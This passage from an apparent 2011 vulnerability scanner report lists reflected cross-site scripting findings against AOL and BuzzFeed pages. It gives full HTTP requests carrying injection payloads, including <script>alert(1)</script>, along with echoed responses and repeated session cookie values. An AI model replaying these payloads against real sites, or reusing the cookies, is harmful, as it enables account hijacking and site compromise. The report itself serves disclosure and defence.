Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:47 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgREh5TENlcjdvUlIzMUQySGtwMWlJNVA2V3FnPQ%3D%3D-cPJ5K0bb4upY7t%2BqFQyM3i0fj914oBHvUK%2BiKZ9H3B71rVvlT5xzjtNsGfK%2FPMQ42S%2FGQQLGm7tCFX3T7l0HAS1M7aTrlsttlgSIYrAjfKSih7ybmy28wcoNRMSfDrCnEZmcSy7IrptfO%2BvnFx%2FWAWYbb0gr3V7rqVgB1RShPs7CBYJ02FBYEQ%3D%3D; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557427&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:47 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 14885
Connection: close


<!doctype html>


<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>

       
           <title>AOL.com - Welcome to AOL</title>

           
               <meta name="description" con
...[SNIP]...
eqchecks('/badbrowser.psp?source=login&sitedomain=aolmobile.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2faolmobile.aol.com%2fregistration%2finclude%2fsnsRefresh.jsp&authLev=0&lang=en&locale=us&uitype=popup9b037</script><a>da98342092f');
</script>
...[SNIP]...

5.144. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp [authLev parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /_cqr/logout/mcLogout.psp

Issue detail

The value of the authLev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5d86"><a%20b%3dc>cedf0535f04 was submitted in the authLev parameter. This input was echoed as d5d86"><a b=c>cedf0535f04 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /_cqr/logout/mcLogout.psp?sitedomain=yellowpages.aol.com&authLev=1d5d86"><a%20b%3dc>cedf0535f04&lang=en&locale=us&siteState=OrigUrl%3D HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:43 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgRjIvZkdPLzQzSGNMU1p4Rk0zZitsc2pwVXZjPQ%3D%3D-UZKm3ggjROk%2FYU1IOZAZBOWS%2Fu5TzvbOC%2B%2Fr4BQv%2BAWPsc5vt%2FGgirdwtWI90VuDvi%2BGx9b%2FCaRZTvjXvERJx9s0BY4nrMuq5Gmq5Sfp70wXKZ4VMMUyiB2RodIaW6s5lj%2FpjhG%2FRZQlo%2FWq6p29yyzwNA6B6FJIwhsTv2MPRNCtiC%2BigA8BcY3LO0lgr8DWmElMFVQpSy0GtXCufQ1VAmBN5Dysu28g; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557423&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:43 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 1567
Connection: close


    <html>
<head>
<LINK href="https://sns-static.aolcdn.com/sns.v11r4/style/snsStyles.css" rel="stylesheet" type="text/css">
<SCRIPT LA
...[SNIP]...
<body onLoad="snsInFrameRedir('http://my.screenname.aol.com/_cqr/logout/mcLogout.psp?sitedomain=yellowpages.aol.com&authLev=1d5d86"><a b=c>cedf0535f04&siteState=OrigUrl%3D&lang=en&locale=us');">
...[SNIP]...

5.145. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp [brandless parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /_cqr/logout/mcLogout.psp

Issue detail

The value of the brandless request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 770a0"><a%20b%3dc>5621d33cee7 was submitted in the brandless parameter. This input was echoed as 770a0"><a b=c>5621d33cee7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /_cqr/logout/mcLogout.psp?authLev=0&sitedomain=www.truveo.com&lang=en&locale=us&brandless=1770a0"><a%20b%3dc>5621d33cee7&succUrl= HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:44 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgRjIvZkdPLzQzSGNMU1p4Rk0zZitsc2pwVXZjPQ%3D%3D-UZKm3ggjROk%2FYU1IOZAZBOWS%2Fu5TzvbOC%2B%2Fr4BQv%2BAWPsc5vt%2FGgirdwtWI90VuDvi%2BGx9b%2FCaRZTvjXvERJx9s0BY4nrMuq5Gmq5Sfp70wXKZ4VMMUyiB2RodIaW6s5lj%2FpjhG%2FRZQlo%2FWq6p29yyzwNA6B6FJIwhsTv2MPRNCtiC%2BigA8BcY3LO0lgr8DWmElMFVQpSy0GtXCufQ1VAmBN5Dysu28g; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557424&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:44 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 1553
Connection: close


    <html>
<head>
<LINK href="https://sns-static.aolcdn.com/sns.v11r4/style/snsStyles.css" rel="stylesheet" type="text/css">
<SCRIPT LA
...[SNIP]...
<body onLoad="snsInFrameRedir('http://my.screenname.aol.com/_cqr/logout/mcLogout.psp?sitedomain=www.truveo.com&authLev=0&lang=en&locale=us&brandless=1770a0"><a b=c>5621d33cee7');">
...[SNIP]...

5.146. https://my.screenname.aol.com/badbrowser.psp [authLev parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /badbrowser.psp

Issue detail

The value of the authLev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2412e"><a%20b%3dc>321d509658 was submitted in the authLev parameter. This input was echoed as 2412e"><a b=c>321d509658 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /badbrowser.psp?source=login&sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=02412e"><a%20b%3dc>321d509658&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:44 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:44 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2923
Connection: close



...[SNIP]...
<a href="/_cqr/login/login.psp?sitedomain=startpage.aol.com&authLev=02412e"><a b=c>321d509658&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.aol.com%2F&lang=en&locale=us">
...[SNIP]...

5.147. https://my.screenname.aol.com/badbrowser.psp [authLev parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /badbrowser.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 966c4"%3b53cc90668c2 was submitted in the authLev parameter. This input was echoed as 966c4";53cc90668c2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /badbrowser.psp?source=login&sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0966c4"%3b53cc90668c2&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:45 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:45 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2911
Connection: close



...[SNIP]...
="sso";
s_265.pageName="sso : badbrowser";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/snsBadBrowser.jsp";
s_265.prop16="startpage.aol.com";
s_265.prop17="std";
s_265.prop18="0966c4";53cc90668c2";
s_265.prop19="vl6";
s_265.prop20="en-us";
s_265.prop21="AOLPortal";
s_265.prop22=".aol.com";
s_265.prop23="aol-com-jv3-en-us";
s_265.mmxgo=true;
var s_code=s_265.t();
if(s_code)document.write(s_code
...[SNIP]...

5.148. https://my.screenname.aol.com/badbrowser.psp [offerId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /badbrowser.psp

Issue detail

The value of the offerId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73708"%3bca33ab712c1 was submitted in the offerId parameter. This input was echoed as 73708";ca33ab712c1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /badbrowser.psp?source=login&offerId=aol-com-jv3-en-us73708"%3bca33ab712c1&sitedomain=startpage.aol.com&siteState=http://www.aol.com&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:44 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:44 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2924
Connection: close



...[SNIP]...
sp";
s_265.prop16="startpage.aol.com";
s_265.prop17="std";
s_265.prop18="1";
s_265.prop19="vl6";
s_265.prop20="en-us";
s_265.prop21="AOLPortal";
s_265.prop22=".aol.com";
s_265.prop23="aol-com-jv3-en-us73708";ca33ab712c1";
s_265.mmxgo=true;
var s_code=s_265.t();
if(s_code)document.write(s_code);
//-->
...[SNIP]...

5.149. https://my.screenname.aol.com/badbrowser.psp [offerId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /badbrowser.psp

Issue detail

The value of the offerId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 408b7"><a%20b%3dc>b30f94d299c was submitted in the offerId parameter. This input was echoed as 408b7"><a b=c>b30f94d299c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /badbrowser.psp?source=login&offerId=aol-com-jv3-en-us408b7"><a%20b%3dc>b30f94d299c&sitedomain=startpage.aol.com&siteState=http://www.aol.com&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:43 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:44 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2938
Connection: close



...[SNIP]...
<a href="/_cqr/login/login.psp?sitedomain=startpage.aol.com&authLev=1&siteState=http%3A%2F%2Fwww.aol.com&lang=en&locale=us&offerId=aol-com-jv3-en-us408b7"><a b=c>b30f94d299c">
...[SNIP]...

5.150. https://my.screenname.aol.com/badbrowser.psp [sitedomain parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /badbrowser.psp

Issue detail

The value of the sitedomain request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ded56"%3b7db10e54842 was submitted in the sitedomain parameter. This input was echoed as ded56";7db10e54842 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /badbrowser.psp?source=login&sitedomain=startpage.aol.comded56"%3b7db10e54842&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:44 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:44 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2826
Connection: close



...[SNIP]...
r="my.screenname.aol.com";
s_265.pfxID="sso";
s_265.pageName="sso : badbrowser";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/snsBadBrowser.jsp";
s_265.prop16="startpage.aol.comded56";7db10e54842";
s_265.prop17="std";
s_265.prop18="0";
s_265.prop19="wa3";
s_265.prop20="en-us";
s_265.mmxgo=true;
var s_code=s_265.t();
if(s_code)document.write(s_code);
//-->
...[SNIP]...

5.151. https://my.screenname.aol.com/badbrowser.psp [sitedomain parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /badbrowser.psp

Issue detail

The value of the sitedomain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9eaa"><a>2d990b897f5 was submitted in the sitedomain parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /badbrowser.psp?source=login&sitedomain=startpage.aol.comc9eaa"><a>2d990b897f5&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:43 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:43 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2832
Connection: close



...[SNIP]...
<a href="/_cqr/login/login.psp?sitedomain=startpage.aol.comc9eaa"><a>2d990b897f5&authLev=0&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.aol.com%2F&lang=en&locale=us">
...[SNIP]...

5.152. http://o.aolcdn.com/smartbox/SBG/REST/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /smartbox/SBG/REST/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5ede4<script>alert(1)</script>239d61e336 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbox/SBG/REST/?f=json&c=11&fids=n,sn,en,e,cc,t&service=SmartBoxQuotes&t=all&callback=processSBJSON5ede4<script>alert(1)</script>239d61e336 HTTP/1.1
Host: o.aolcdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=3600
Expires: Thu, 05 May 2011 14:04:36 GMT
Date: Thu, 05 May 2011 13:04:36 GMT
Content-Length: 55
Connection: close

processSBJSON5ede4<script>alert(1)</script>239d61e336()

5.153. http://pglb.buzzfed.com/10032/f4f3ccafe3fc01872a82127ebf3deddd [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /10032/f4f3ccafe3fc01872a82127ebf3deddd

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 21ff9<script>alert(1)</script>28fc23c1688 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /10032/f4f3ccafe3fc01872a82127ebf3deddd?callback=BF_PARTNER.gate_response21ff9<script>alert(1)</script>28fc23c1688&cb=2731 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
